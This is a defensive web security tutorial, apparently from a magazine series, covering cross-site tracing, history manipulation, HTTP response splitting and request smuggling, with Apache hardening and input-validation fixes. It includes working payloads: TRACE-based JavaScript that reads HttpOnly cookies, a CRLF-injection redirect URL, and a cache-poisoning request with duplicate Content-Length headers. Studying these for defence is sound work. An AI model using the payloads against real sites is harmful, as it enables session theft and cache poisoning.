Web browsers use a security model called the same-origin policy (SOP) to enforce some access restrictions on Web applications. The SOP identifies each website using its origin, which is a unique combination of protocol, domain and port, and creates a context for each origin. Two resources are considered to be of the same origin only if all these values are exactly the same.
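The origin comparison described above can be sketched in a few lines of Python. This is only an illustration of the (protocol, domain, port) rule, not how any browser implements it; the function names and the default-port table are assumptions.

```python
from urllib.parse import urlsplit

# Assumed default ports, used when a URL does not state one explicitly.
DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (protocol, domain, port) triple that identifies an origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)


def same_origin(url_a, url_b):
    """Two resources share an origin only if all three values are identical."""
    return origin(url_a) == origin(url_b)
```

For example, http://www.example.com/a and http://www.example.com:80/b compare as the same origin, while switching to https, to another port, or to another subdomain produces a different one.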
Click-jacking is an attack involving embedded objects on a maliciously crafted Web page. Using framed content, or that from Flash, Silverlight, or Java, the attacker places a transparent or invisible click button beneath the mouse, so that whenever the user clicks on something they see on the page, the user is also clicking to an unseen website that may contain malicious code. The attack can also take advantage of dynamic HTML and CSS (Cascading Style Sheets) code for further disguise. The difference between CSRF and click-jacking is that in CSRF, the victim’s browser performs the attack (loading the state-changing URL directly) without the victim clicking to launch it, while in click-jacking, the user actually interacts with something, but the action is ‘hijacked’ by placing a layer between the user and the page element that launches a legitimate action.
iv.
We discussed XSS attacks earlier in this series; among the solutions, we talked about using the HttpOnly cookie mechanism. HttpOnly is a session protection mechanism which specifies that the session identifier should not be accessible from the application DOM. In that case, the attacker cannot hijack the session using malicious scripts, because document.cookie does not return anything useful. HttpOnly works with almost all modern browsers. It is implemented simply as:
Set-Cookie: PHPSESSIONID=[token]; HttpOnly
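For readers who generate this header from application code, the following Python sketch builds the same header with the standard library’s http.cookies module. The function name session_cookie_header is hypothetical, and the cookie name is simply the one used in this article.

```python
from http.cookies import SimpleCookie


def session_cookie_header(token):
    """Build a Set-Cookie header line whose cookie is flagged HttpOnly."""
    cookie = SimpleCookie()
    cookie["PHPSESSIONID"] = token
    cookie["PHPSESSIONID"]["httponly"] = True  # hide the cookie from document.cookie
    return cookie.output()
```

Calling session_cookie_header with a session token returns one header line that can be sent with the response.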
HttpOnly was by far one of the best ways to stop XSS attacks from fetching a victim’s cookies, until it was found that the web server’s HTTP TRACE method (more about it below) can be used to bypass the HttpOnly mechanism. If an attacker uses XSS to force the victim’s browser to issue a TRACE request to the web server, and the browser has a cookie for that domain, the cookie is automatically included in the request headers and is therefore echoed back in the response. At that point, the cookie string is accessible to JavaScript, and can be sent to a third party even though the cookie is tagged as HttpOnly. This technique is called cross-site tracing (XST): in essence, it is an XSS attack that uses TRACE.
HTTP TRACE and XST
The HTTP TRACE request is a method designed for debugging problems such as network connection errors between servers. It is defined alongside other well-known methods like GET, PUT and DELETE. When a client sends a TRACE request to a compliant server, the server responds by echoing back the headers sent by the client. An attacker can exploit this to circumvent HttpOnly cookies by injecting code that sends an asynchronous XMLHttpRequest with the TRACE method, and receiving the HttpOnly cookie in the message echoed back by the server. Let’s have a look at a simple attack scenario to understand it clearly:
Attack scenario
Let’s continue with the example that we used (for reflected XSS) in part 2 of this series. Suppose an attacker finds an XSS vulnerability in a web application whose script displays the criteria used in a website query as part of the URL for the results of the query. For example, the URL in the browser for a page showing the results of a search for “products” might be http://www.example.com/search.php?query=products. Now, take the following cases:
1. When HttpOnly cookies are not deployed, and TRACE is enabled. Here, as already discussed in part 2, the attacker might post a modified link, such as this:
http://www.example.com/search.php?query=<script>alert(document.cookie)</script>
This harmless example will cause the victim’s browser to pop up an alert box, showing their current set of cookies.
2. When HttpOnly cookies are deployed but TRACE is still enabled. Here, it is clear that the above method will not work for the attacker, because HttpOnly will not return these cookies to the JavaScript document.cookie. So here, the attacker, knowing that TRACE is enabled on the web server (they can verify it by methods given in the security section below), might use something like the following code (call it mal.js):
var x = new ActiveXObject("Microsoft.XMLHTTP");
// var x = new XMLHttpRequest();
x.open("TRACE", "http://example.com", false);
x.send();
//x.send("");
cookie = x.responseText;
alert(cookie);
(The code above is for Internet Explorer; the modifications required for Mozilla browsers are commented out.) This will show the victim their cookies in an alert box even though HttpOnly is used. Remember, the attacker can shorten such a long malicious URL via tiny URL techniques (refer to part 2 of this series). Instead of merely displaying them, the attacker can also steal the cookies and other login credentials. A visualisation of this is shown in Figure 1.
Figure 1: Attack possible with TRACE enabled
Figure 2: Attack not possible with TRACE disabled
The particular example above is taken just for educational purposes. I once again stress that neither I nor LFY aim to teach readers how to attack servers. Rather, the attack techniques are meant to give you knowledge that you need to protect your own infrastructure.
What’s going on behind the scenes?
The above code, using the ActiveX control XMLHTTP, sends a TRACE request to the target web server. If TRACE is enabled on the web server, it echoes back the information sent within the HTTP request. Now, if the victim’s browser happens to have a cookie from the target web server, or is logged in to the server using implicit authentication mechanisms, those credentials appear in the echoed response, where the script can read them.
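The echo behaviour is easy to observe on a throwaway local server. The Python sketch below is only a simulation for study: TraceEchoHandler and trace_echo_demo are hypothetical names, and the handler mimics what a TRACE-enabled server does rather than reproducing Apache’s implementation.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class TraceEchoHandler(BaseHTTPRequestHandler):
    """Toy server that answers TRACE by echoing the request back."""

    def do_TRACE(self):
        # Echo the request line and every header the client sent, cookies included.
        echoed = f"{self.requestline}\r\n{self.headers}".encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(echoed)))
        self.end_headers()
        self.wfile.write(echoed)

    def log_message(self, *args):
        pass  # keep the demonstration quiet


def trace_echo_demo(cookie_value):
    """Send one TRACE request carrying a cookie and return the echoed body."""
    server = HTTPServer(("127.0.0.1", 0), TraceEchoHandler)  # port 0: any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", server.server_port)
        conn.request("TRACE", "/", headers={"Cookie": cookie_value})
        body = conn.getresponse().read().decode()
        conn.close()
        return body
    finally:
        server.shutdown()
        server.server_close()
```

The string returned by trace_echo_demo contains the Cookie header exactly as the client sent it. This is why a script that can read a TRACE response can also read a cookie that document.cookie would hide.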
What if you disable TRACE?
Many security experts suggest that you disable the web server’s TRACE method to begin with, and this is indeed an effective security measure (see Figure 2). However, if there is a proxy server between the client and the web server, it has been found possible to force the proxy server, rather than the origin server itself, to respond to the TRACE request. To do this, the attacker simply includes “Max-Forwards: 0” in the HTTP request header. Seeing this, the first proxy server in the chain responds to the TRACE request instead of forwarding it to the web server. Hence, the XSS script could be updated to:
var x = new ActiveXObject("Microsoft.XMLHTTP");
// var x = new XMLHttpRequest();
x.open("TRACE", "http://example.com", false);
x.setRequestHeader("Max-Forwards", "0");
x.send();
//x.send("");
c = x.responseText;
alert(c);
(Again, the base code is for Internet Explorer; the modifications for Mozilla are commented out.) Microsoft, trying to secure Internet Explorer, removed support for any method starting with TRACE in the XmlHttp object. However, this security measure was also broken when it was found that instead of using "TRACE", the attacker can simply use "\r\nTRACE". Hence, the line x.open("TRACE", "http://example.com", false) in the above script would become x.open("\r\nTRACE", "http://example.com", false).
Cross-site tracing (XST) is one of the most silently prevalent threats on the Internet today. However, following the security tips below can help you curb it.
Time for Security
1. The first and foremost security measure is to disable the TRACE request method (unless needed) on your web servers.
2. Moreover, web-server vendors should have TRACE disabled in the web server’s default “out-of-the-box” configuration.
3. Proxy servers should also be shipped with TRACE disabled in their default configurations.
4. Disable TRACE in your browser’s XmlHttpRequest object too. For this, check the support page of your browser’s vendor.
5. For all Internet Explorer users: if you must continue using Internet Explorer, switch to version 7 or 8, because they seem to have patches for this attack. However, the far better path, which I recommend, is for you to use the latest versions of Mozilla Firefox (>3.2) instead.
How to disable TRACE in Apache?
Disabling TRACE in Apache is quite easy. All you need is the Apache mod_rewrite module; then follow these steps:
1. Activate mod_rewrite in httpd.conf by adding this line to it:
LoadModule rewrite_module modules/mod_rewrite.so
2. Add the following lines in httpd.conf to disable TRACE:
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]
3. Now, restart the Apache web server.
After TRACE has been disabled according to the instructions above, any incoming TRACE requests will be responded to with an HTTP status code of either 403 or 405. You can also verify it by telnetting to your server, as shown below:
server@attacker~$ telnet www.victim.com 80
OPTIONS / HTTP/1.1
Host: www.victim.com

HTTP/1.1 200 OK
Server: Apache-httpd/2.2.1
Date: Tue, 31 Oct 2006 08:00:29 GMT
Connection: close
Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
Content-Length: 0
As we can see in the example, the Allow line provides a list of the HTTP methods that are supported by the web server. In this case, we see that every method is enabled except for the TRACE method.
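The same check can be scripted. In the Python sketch below, allowed_methods parses an Allow header like the one in the telnet session, and trace_rejected sends a real TRACE request and looks for the 403 or 405 status mentioned earlier. Both function names are hypothetical, and trace_rejected should only be pointed at servers you administer.

```python
import http.client


def allowed_methods(allow_header):
    """Turn an Allow header value into a set of upper-case method names."""
    return {m.strip().upper() for m in allow_header.split(",") if m.strip()}


def trace_rejected(host, port=80, timeout=5):
    """Send a TRACE request and report whether the server refused it."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("TRACE", "/")
        return conn.getresponse().status in (403, 405)
    finally:
        conn.close()
```

Sending the TRACE request itself is the more direct test, since an Allow header is only the server’s own description of what it accepts.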
Let’s now move on to another web application attack: cross-site history manipulation (XSHM).
Cross-site history manipulation (XSHM)
This recently evolved attack works by taking advantage of an individual’s browsing history, seen in Mozilla Firefox, Google Chrome and Internet Explorer. By manipulating the browser history, it is possible to compromise a web browser’s same-origin policy (SOP), and so violate user privacy.
Recall that in part 3 of this series we discussed a bit about SOP, and also that web pages from different origins cannot communicate with each other (‘communicate’ here means that a page from one origin can only send an HTTP request to a page from different origin. However, it cannot read an HTTP response of a page from different origin). Hence, while doing CSRF, an attacker can only submit malicious HTTP requests to a bank website, but he/she cannot read the HTTP response from that site. However, recently it was found that even these limitations for the attacker can be bypassed by compromising SOP, via manipulation of the browser’s history objects. First, let’s look at the design of the browser history object.
Browser history object
Browser history is a global list of pages visited by the user, which the user can cycle through by pressing the Back and Forward buttons of the browser. Some of its features are:
1. If the same URL is opened multiple times, only one entry will be made in the history list.
2. If a user opens page B, which is then automatically redirected to page A (by the web server), then only the URL of page A will be entered into the history list.
3. It is possible to open a URL without adding it to the history list. By using location.replace, we can open different URLs, one after the other, replacing the current history position.
4. SOP only prevents JavaScript from accessing URLs in the history; it does not prevent access to history.length (the number of elements in the global history list). Also, it is possible to load a specific URL from the history list, using history.go(URL).
The following are XSHM attack vectors which use manipulation of the browser’s history object:
Cross-site condition leakage
Cross-site user tracking
Cross-site URL/parameters enumeration
We will focus on these one by one.
Cross-site condition leakage
Suppose a site contains the following logic:
Page A: If(Condition)
Redirect(Page B)
Here, an attacker can execute a CSRF attack to get an indication about the value of Condition (whether it’s TRUE or FALSE) as feedback. Such an attack is executed from the attacker’s site, using the following attack process:
1. The attacker creates an IFRAME whose src is Page B.
2. The code saves the current value of history.length in a variable.
3. The code then changes the src of the IFRAME to Page A.
4. The code compares the saved value with the present value of history.length; if they are the same, then Condition is TRUE.
The above algorithm relies on the second feature of the browser’s history object listed above. If Condition is TRUE, Page A redirects to Page B, which is already in the history, so history.length remains the same after opening Page A. If Condition is FALSE, Page A is added to the browser’s history, which increases its length by one. Since an attacker can open both URLs from his page inside an IFRAME, and history.length is accessible from a page on the attacker’s site, this is a case of cross-site condition leakage, and hence a violation of SOP. After getting an indication of the value of Condition, the attacker can now plan a two-way CSRF attack (a two-way CSRF attack means that the attacker gets a response to the CSRF attack). Let’s have a look at a simple attack scenario.
Attack scenario
Suppose a bank application allows transfer of money from one account to another. Now, the site might use the following code for this:
If (Money_Transfer())
Redirect("Transaction_done.php");
The above code executes the money-transfer transaction, and if the transaction succeeds, then the user’s browser is redirected to the Transaction_done page. In this case, an attacker can not only execute a CSRF attack and transfer money, but can also get feedback on whether this operation was successfully completed, using the following attack process:
1. The attacker creates an IFRAME with src='Transaction_done.php', in a page whose script reads history.length.
2. The script records the current value of the victim’s history.length.
3. The script then changes the src of the IFRAME to 'Money_transfer.php'.
4. If the value of history.length remains the same, then the operation was successfully completed.
However, this was a simple attack scenario; besides this, the attacker can also detect the user’s authentication state, and can also access valuable intranet resources, which otherwise cannot be accessed publicly.
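The history-length comparison behind condition leakage can be replayed in a small Python simulation. This is a toy model of the history features listed earlier, not real browser behaviour: SimulatedHistory and condition_leaks_true are hypothetical names, and the model only collapses a repeated URL when it is already the newest entry.

```python
class SimulatedHistory:
    """Toy model of the history rules listed in this article (not a real browser)."""

    def __init__(self):
        self.entries = []

    def navigate(self, url, redirects=None):
        # Feature 2: after a server-side redirect, only the final URL is recorded.
        final_url = (redirects or {}).get(url, url)
        # Feature 1 (simplified): re-opening the newest URL adds no new entry.
        if not self.entries or self.entries[-1] != final_url:
            self.entries.append(final_url)

    @property
    def length(self):
        return len(self.entries)


def condition_leaks_true(condition):
    """Replay the four attack steps and return what the attacker infers."""
    # Page A redirects to Page B only when the server-side condition holds.
    redirects = {"PageA": "PageB"} if condition else {}
    history = SimulatedHistory()
    history.navigate("PageB")             # step 1: IFRAME src = Page B
    saved = history.length                # step 2: remember history.length
    history.navigate("PageA", redirects)  # step 3: IFRAME src = Page A
    return history.length == saved        # step 4: unchanged length means TRUE
```

The attacker never reads a URL or a response. The single number history.length is enough to recover the value of the condition.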
Cross-site user tracking
While using an IFRAME, an attacker has limitations: the attacker cannot know what the victim is doing in the IFRAME, and, by design, an IFRAME cannot communicate with its parent page. But, using XSHM, an attacker can bypass these limitations too, and in some cases track user activities inside an IFRAME. To track the victim’s activities in a page inside an IFRAME, the attacker builds a list of URLs that a parent page contains, or can submit. When the victim clicks a link in the IFRAME, history.length remains the same if the URL of that link is already on top of the history list. The attacker can therefore use location.replace to probe different URLs from the list, without inserting them at the top of the history list. A typical attack process is as follows:
1. The attacker creates an IFRAME with its src as the victim’s site, in a page whose script reads history.length.
2. On each load event of the IFRAME, the attacker remembers the current value of the victim’s history.length, and then changes the src of the IFRAME to a URL which the parent page can access.
3. Repeating the last two actions for all URLs the parent page can access, until the value of history.length ceases to increase, lets the attacker know which link the user clicked, and when it was clicked.
An example of this is a phishing attack in which the attacker opens a legitimate site from an IFRAME. As the victim clicks a link to log in, the attacker is notified of this, and opens a fake login page instead.
Cross-site URL/parameters enumeration
This is another attack vector of XSHM, through which the attacker can also enumerate previously browsed URLs. The attack process for this is quite simple:
1. The attacker builds an array of URLs to check (let’s call it URL[]).
2. The attacker then runs history.go(URL[x]) for each URL in the list.
3. If a document.unload occurs, the event assures the attacker that URL[x] was visited in the current session.
The only limitation of the above process is that, prior to the attack, the attacker must populate the URL[] array with every URL to be checked.
Cross-site history manipulation (XSHM) is a new attack vector, by which the Same Origin Policy can be compromised, and the user’s privacy can be violated. XSHM enhances CSRF by making it a two-way attack. However, the following security tips can help curb it.
Time for security
If your application uses conditional redirects, it might be vulnerable to XSHM. However, for the following code, there is no potential risk:
if (url != "")
Response.Redirect(url);
This is because the condition if(url != "") is specific, and cannot produce TRUE or FALSE.
1. For successful prevention of cross-site history manipulation, both the URL of the origin page from which redirection is executed, and a redirected target page, should contain a random token, as shown below:
If ( !isAuthenticated)
Redirect("Login.aspx?r=" + Random())
2. To prevent URL/parameters enumeration, all site URLs should contain random tokens placed inside the URL.
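As one possible way to add such a token, the Python sketch below appends a random query parameter to a redirect target. The helper name with_random_token is hypothetical, and the parameter name r is borrowed from the Login.aspx example above.

```python
import secrets
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def with_random_token(url, param="r"):
    """Return url with an unpredictable token appended to its query string."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    query.append((param, secrets.token_urlsafe(16)))  # fresh token on every call
    return urlunsplit(parts._replace(query=urlencode(query)))
```

Because every redirect target is now unique, it can never match a URL the attacker has already placed in the history list, so history.length no longer reveals whether the redirect happened.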
For further information on these attacks, don’t forget to visit the resources below. We will deal with other dangerous attacks on web applications and Apache in the next article. Always remember: know hacking, but no hacking.
vi.
In the last four articles in this series, we have discussed SQL injection, XSS, CSRF, XST and XSHM attacks, and security solutions. This time, we focus on attacks exploiting the HTTP message architecture in the client-proxy-server system.
Intercepting HTTP messages has always been high on the priority list of attackers. Their focus is on what’s going on between the server and the client. The presence of intermediaries such as cache servers, firewalls, or reverse proxy servers makes for potentially highly non-secure communication. Attacks which deal with interception of HTTP messages are:
HTTP response splitting.
HTTP request smuggling.
HTTP request splitting.
HTTP response smuggling.
Let’s look at these one by one.
HTTP response splitting attack
Also known as a CRLF injection, this attack causes a vulnerable web server to respond to a maliciously crafted request by sending an HTTP response stream which is interpreted as two separate responses instead of a single one. This is possible when user-controlled input is used, without validation, as part of the response headers. An attacker can have the victim interpret the injected header as being a response to a second, dummy, request, thereby causing the crafted contents to be displayed, and possibly cached. To achieve HTTP response splitting on a vulnerable web server, the attacker:
1. Identifies user-controllable input that causes arbitrary HTTP header injection.
2. Crafts a malicious input consisting of data to terminate the original response and start a second response with headers controlled by the attacker.
3. Causes the victim to send two requests to the server. The first request consists of maliciously crafted input to be used as part of HTTP response headers, and the second is a dummy request so that the victim interprets the split response as belonging to the second request.
This attack is generally carried out in web applications by injecting malicious or unexpected characters in user input which is used for a 3xx Redirect, in the Location or Set-Cookie header. It is mainly possible due to lack of validation of user input for characters such as CR (Carriage Return = %0d = \r) and LF (Line Feed = %0a = \n). In such web applications, a sequence such as “\r\n” is injected in one of its many encoded forms.
To understand how it works, let’s first understand a normal response to a 302 redirection. This is a ‘normal redirect’ script in PHP:
Requests to this page such as http://test.example.com/~arpit/redirect.php?page=http://www.example.com would redirect the user’s browser to http://www.example.com. Let’s look at the HTTP headers during this session.
User to server—sample GET request:
GET /~arpit/redirect.php?page=http://www.example.com HTTP/1.1\r\n
Host: test.example.com\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052960 Firefox/3.6.2\r\n
…..
Accept-Language: en-us,en;q=0.5\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n
Server to user—302 response:
HTTP/1.1 302 Found\r\n
Date: Tue, 12 Apr 2005 21:00:28 GMT\r\n
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0a\r\n
Location: http://www.example.com\r\n [User input in headers]
……
Content-Type: text/html\r\n
Connection: Close\r\n
User to server—GET request for redirected page:
GET / HTTP/1.1\r\n
Host: www.example.com\r\n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052960 Firefox/3.6.2\r\n
…….
Accept-Language: en-us,en;q=0.5\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Figure 1: Normal client-server communication for 302 redirect
Now, the server will respond with a normal 200 OK response, and the user will see the web page loaded from www.example.com. The ‘usual’ HTTP headers above can also be visualised as in Figure 1.
Now, an attacker might use the %0d%0a characters to poison the header, by injecting something like:
http://test.example.com/~arpit/redirect.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0aContent-Length:%206%0d%0a%0d%0a%3Chtml%3EHACKED%3C/html%3E
That is, the injected code is:
\r\n
Content-Type: text/html\r\n
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
Content-Length: 6\r\n
\r\n
HACKED
This malicious link (shortened via the tiny URL technique), if followed/clicked by the victim, sends the following request to the server:
GET /~arpit/redirect.php?page=%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0aContent-Length:%206%0d%0a%0d%0a%3Chtml%3EHACKED%3C/html%3E
Host: test.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052960 Firefox/3.6.2
……
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
The server would respond:
HTTP/1.1 302 Found [First standard 302 response]
Date: Tue, 12 Apr 2005 22:09:07 GMT
Server: Apache/2.3.8 (Unix) mod_ssl/2.3.8 OpenSSL/1.0.0a
Location:
Content-Type: text/html
HTTP/1.1 200 OK [Second New response created by attacker begins]
Content-Type: text/html
Content-Length: 6

HACKED [Arbitrary input by user is shown as the redirected page]
Content-Type: text/html
Connection: Close
Figure 2 : Response splitting attack process
As we can see in the exploitation process above, the server runs the normal 302 response, but the arbitrary input in the location header causes it to start a new 200 OK response, which shows our input data to the victim as a normal web server response. Hence, the victim will see a web page with the text HACKED. The overall steps are shown in Figure 2. This example is a simple case of XSS exploitation using an HTTP response-splitting vulnerability. Apart from this, an attacker can also do web cache poisoning, cross-user attacks, and browser cache poisoning.
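To see the split in miniature, the Python sketch below builds a 302 response the unsafe way and counts the status lines in the result. It is a simplified model that assumes the application URL-decodes the page parameter and copies it into the Location header unchecked; naive_redirect_response and count_status_lines are hypothetical names.

```python
from urllib.parse import unquote


def naive_redirect_response(page_param):
    """Build a 302 response the unsafe way: user input goes straight into a header."""
    location = unquote(page_param)  # the application decodes %0d%0a into CR/LF
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Location: {location}\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    )


def count_status_lines(raw_response):
    """Count how many HTTP status lines a client would find in the byte stream."""
    return sum(1 for line in raw_response.split("\r\n") if line.startswith("HTTP/1.1 "))


# The injected value from the example above, with ordinary ASCII hyphens.
PAYLOAD = (
    "%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0a"
    "Content-Type: text/html%0d%0aContent-Length:%206%0d%0a%0d%0a"
    "%3Chtml%3EHACKED%3C/html%3E"
)
```

With a normal target such as http://www.example.com the stream holds one status line; with PAYLOAD it holds two, which is exactly the point at which a client or cache starts treating the attacker’s text as a second response.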
Cross-user attacks
In cross-user attacks, the second response sent by the web server may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the server. In this way, a response crafted through one user’s request is served to another user.
To perform cache poisoning, the attacker will simply add a ‘Last-Modified’ header in the injected part (to cache the malicious web page as long as the Last-Modified header is sent with a date ahead of the current date). Moreover, adding ‘Cache-Control: no-cache’ and/or ‘Pragma: no-cache’ in the injected part will cause non-cached websites to be added to the cache.
Time for security
This vulnerability in web applications may lead to defacement through web-cache poisoning, and to cross-site scripting vulnerabilities, but the following methods can help curb it:
The best way to avoid HTTP response-splitting vulnerabilities is to check all user input for CR/LF (i.e., \r\n, %0d%0a, or any other encoded form of these) and other such malicious characters before using it in any kind of HTTP header.
Properly escape the URI in every place where it is output, like the HTTP Location Header, so that even if CR/LF is present, it will not be parsed by the browser.
The myth that using SSL saves one from the attack is not true; it still leaves browser cache and post-SSL termination uncovered. Don’t rely on SSL to save you from this attack.
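The CR/LF check recommended above could look something like the following Python sketch. It repeatedly percent-decodes the input so that nested encodings such as %250d%250a are also caught; contains_crlf, safe_location_header and the limit of three decoding rounds are assumptions made for illustration.

```python
from urllib.parse import unquote


def contains_crlf(value, max_decodes=3):
    """Return True if value holds CR or LF, raw or percent-encoded (even nested)."""
    current = value
    for _ in range(max_decodes + 1):
        if "\r" in current or "\n" in current:
            return True
        decoded = unquote(current)
        if decoded == current:
            return False  # fully decoded and clean
        current = decoded
    return True  # still changing after max_decodes rounds: treat as suspicious


def safe_location_header(target):
    """Build a Location header line, refusing targets that carry CR/LF."""
    if contains_crlf(target):
        raise ValueError("CR/LF found in redirect target")
    return f"Location: {target}\r\n"
```

Rejecting the request outright, as done here, is the simpler choice; stripping the offending characters and continuing is also possible, but it makes the resulting behaviour harder to reason about.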
For more attack vectors and solutions to them, don’t forget to visit the resources at the end of this article.
HTTP request smuggling attack
HTTP request smuggling attacks are aimed at distributed systems that handle HTTP requests (especially those that contain embedded requests) in different ways. Such differences can be exploited in servers or applications that pass HTTP requests along to another server directly, like proxies, cache servers, or firewalls. If the intermediate server interprets the request one way (thus seeing a particular request), and the downstream server interprets it another way (thus seeing a different particular request), then responses will not be associated with the correct requests. Hence, the intermediary device, which should protect the network from dangerous HTTP requests, treats the malicious request as data, while the server can interpret it as a proper request.
This dissociation could cause cache poisoning or cross-site scripting (XSS), with the result that the user could be shown inappropriate content. Alternatively, it could cause firewall protection to be bypassed, or cause disruption of response-request tracking and sequencing, thus increasing the vulnerability of your server to additional, possibly even more serious, attacks.
Why does it work? Request smuggling exploits the way in which HTTP end-points parse and interpret the protocol, and counts on the lax enforcement of the HTTP specification (RFC 2616). RFC 2616 specifies that there should be one, and only one, Content-Length header. But, by using multiple Content-Length headers, it is possible to confuse proxies and bypass some web application firewalls, because of the way in which they interpret the HTTP headers. This is partly because RFC 2616 does not specify the behaviour of an endpoint when receiving multiple HTTP headers, and partly because end-points have always been more forgiving of clients that take liberties with the HTTP protocol than they should be. So some end-points ignore the first, or the second, and then use the data included in Content-Length to parse the request. This can be used to direct proxies to treat requests as data, and vice-versa, which can confuse end-points, and trick them into executing malicious requests hidden inside legitimate requests.
Attack scenario
This particular case depicts a web-cache-poisoning attack via request smuggling. It involves sending a set of HTTP requests to a system comprising a web server (www.example.com) and a caching proxy server. Here, the attacker’s goal is to make the cache server cache the content of www.example.com/resource_denied.html instead of www.example.com/welcome.html.
Note: For a successful request-smuggling attack, there should be an XSS vulnerability in the web application.
The attack involves sending an HTTP POST request with multiple Content-Length headers. The attacker sends this to the proxy server:
POST http://www.example.com/some.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 39

GET /resource_denied.html HTTP/1.1
Blah: GET http://www.example.com/welcome.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
The proxy will see the header section of the first (POST) request. It then uses the last Content-Length header (39 bytes) to process the body of the message; it reads the body (up till 39 bytes) and sends the web server the original request:
POST http://www.example.com/some.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 39

GET /resource_denied.html HTTP/1.1
Blah:
The web server sees the first request (i.e. POST), uses the first Content-Length header, and interprets the first request as:
POST http://www.example.com/some.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Content-Length: 39
Note the empty body (Content-Length is 0 bytes). The web server answers this request, and then it has another partial request (given below), awaiting completion in the queue:
GET /resource_denied.html HTTP/1.1
Blah:
The proxy now receives the web server’s first response, forwards it to the attacker, and proceeds to read the attacker’s second request, which will be:
GET http://www.example.com/welcome.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
Now, it is quite clear that the web server’s response for this request will be cached by the proxy as the response for the URI http://www.example.com/welcome.html. The proxy forwards this request to the web server. It is appended to the end of the web server’s partial request, which is now completed, as shown:
GET /resource_denied.html HTTP/1.1
Blah: GET http://www.example.com/welcome.html HTTP/1.1
Host: www.example.com
Connection: Keep-Alive
The web server finally has a full second request from this client, which it can now process. It interprets the request stream as containing an HTTP request for http://www.example.com/resource_denied.html. The ‘Blah’ HTTP header has no meaning according to the HTTP RFC, and thus is ignored by the web server. The net result is that the content of the page http://www.example.com/resource_denied.html is returned in response to a (poisoned) request for http://www.example.com/welcome.html. Now, till the cache entry expires, the cache server will deliver cached copies of resource_denied.html to victims who request welcome.html.
Figure 3 : Request smuggling (web cache poisoning)
This example is a case of partial web-cache poisoning (see Figure 3), because the attacker does not get full control over the cached content. The attacker has no direct control over the returned HTTP headers and, more importantly, has to use an existing (and cacheable) page on the target web site as the content (in the above case, resource_denied.html). Besides cache poisoning, request smuggling can also be used to bypass firewalls/IDS/IPS and to steal authentication credentials. To explore request smuggling further, don’t forget to check the resources at the end of the article.
Time for security
Install a web application firewall that protects against HRS attacks. A few firewalls are still vulnerable to HRS attacks; check with the firewall vendor whether their product protects against HRS.
Apply strong session-management techniques. Terminate the session after each request.
Turn off TCP connection sharing on the intermediate devices. TCP connection sharing improves performance, but allows attackers to smuggle HTTP requests.
Mark all pages as non-cacheable, so that intermediate caches do not store the responses. For more details, refer to http://www.web-caching.com/.
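As a complement to the recommendations above, a front-end check can refuse any request whose body length is ambiguous. The following Python sketch assumes the raw header block is available as bytes; the function name has_unambiguous_length is hypothetical, and a real deployment would rely on the firewall or server rather than on this simplified check.

```python
def has_unambiguous_length(header_block):
    """Return True only if the request carries at most one, numeric,
    Content-Length header."""
    values = []
    for line in header_block.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"content-length":
            values.append(value.strip())
    if len(values) > 1:
        return False  # duplicated header: the framing is ambiguous
    return all(v.isdigit() for v in values)


suspicious = (
    b"POST http://www.example.com/some.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Length: 0\r\n"
    b"Content-Length: 39"
)
normal = (
    b"POST http://www.example.com/some.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"Content-Length: 0"
)

print(has_unambiguous_length(suspicious))
print(has_unambiguous_length(normal))
```

Rejecting the request outright, instead of guessing which header to honour, removes the disagreement between the proxy and the web server.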
HTTP request splitting attack
This attack forces the victim’s browser to send multiple HTTP requests instead of a single request. Two mechanisms have been exploited for this attack to date: the XMLHttpRequest object (XHR for short) and the HTTP digest authentication mechanism. For this attack to work, the victim must use a forward HTTP proxy. To split the HTTP request, CRLFs are injected into it.
